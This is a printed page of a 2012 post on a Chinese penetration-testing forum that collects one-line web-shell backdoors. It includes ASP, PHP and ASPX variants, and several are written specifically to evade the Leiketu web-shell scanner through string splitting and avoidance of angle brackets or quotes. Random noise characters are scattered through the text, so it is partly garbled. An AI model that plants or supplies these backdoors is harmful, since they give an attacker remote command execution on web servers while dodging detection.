中国网络渗透测试联盟

标题: 过雷克图一句话木马 [打印本页]
作者: admin    时间: 2012-9-23 14:36
标题: 过雷克图一句话木马
asp一句话  <%execute(request("1"))%>  
: Y# p+ \+ R2 y4 C$ V' S9 j/ p  S/ ?; U7 ^
php一句话  <?php eval($_POST[1]);?>  8 m1 r4 P6 P6 C& M; G
7 M1 M  Y9 ]1 X  J0 B
aspx一句话, }( E2 r2 }; M0 q5 E; S5 `
0 ~2 J0 p0 d4 i4 m" w# P; k
<script language="C#" runat="server">
9 m& `3 V' z+ I8 v$ L* p- v3 f1 |
WebAdmin2Y.x.y aaaaa = new  WebAdmin2Y.x.y   ("add6bb58e139be10");( _/ X$ X4 b4 o4 e( C6 Y! A* M
2 c1 x  x) t4 y0 Q) V/ c  m
</script>6 d  A. A  Q) p6 O

5 p# N. J% `, Y0 Y) ?+ Y# C可以躲过雷客图的一句话。+ b0 a: T. z6 y* W% f# I

3 c4 E: E. N$ m* {7 O  <%! V: \- p9 J* ]- l0 Q# T
: _9 S* o" M" ]% G' ^3 \
  set ms = server.CreateObject("MSScriptControl.ScriptControl.1")$ V  L2 w9 S( p5 P

5 V  q! D% b* \4 r5 I9 P" X( r  ms.Language="VBScript"+ E3 F! A' w& ^6 v

3 X7 |7 l0 w( O. p  S( n  ms.AddObject "Response", Response
3 ^; r) d3 \8 ?$ h- p
5 M1 n) O( J4 N  ms.AddObject "request", request
: g/ h; y7 y  i" [& S+ P" g) ]& d# X4 }. ]  X
  ms.ExecuteStatement("ev"&"al(request(""1""))")
1 A* P: U4 e& ^/ ~$ i5 e+ x2 c: J2 l6 j
  %>
' ^7 m1 a5 U' {# ?7 C7 D1 y& b  U) ~3 j; K
  不用'<,>'的asp一句话
, W" N" g1 j4 @
& q7 p- H3 R+ c% b6 e  <script language=VBScript runat=server>execute request("1")</script>, h: s, ?  g" c- y9 q9 l  F2 }
0 F0 w. d$ X2 h. M1 y( U
  不用双引号的一句话。
7 ?7 R4 k, ^" ~3 F# O5 l! [
# A* T$ z4 |! H  w$ H5 E1 t+ [  <%eval request(chr(35))%>
9 T  N1 a- g! ], W1 G6 O6 ?# I3 u6 Q9 k  y



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2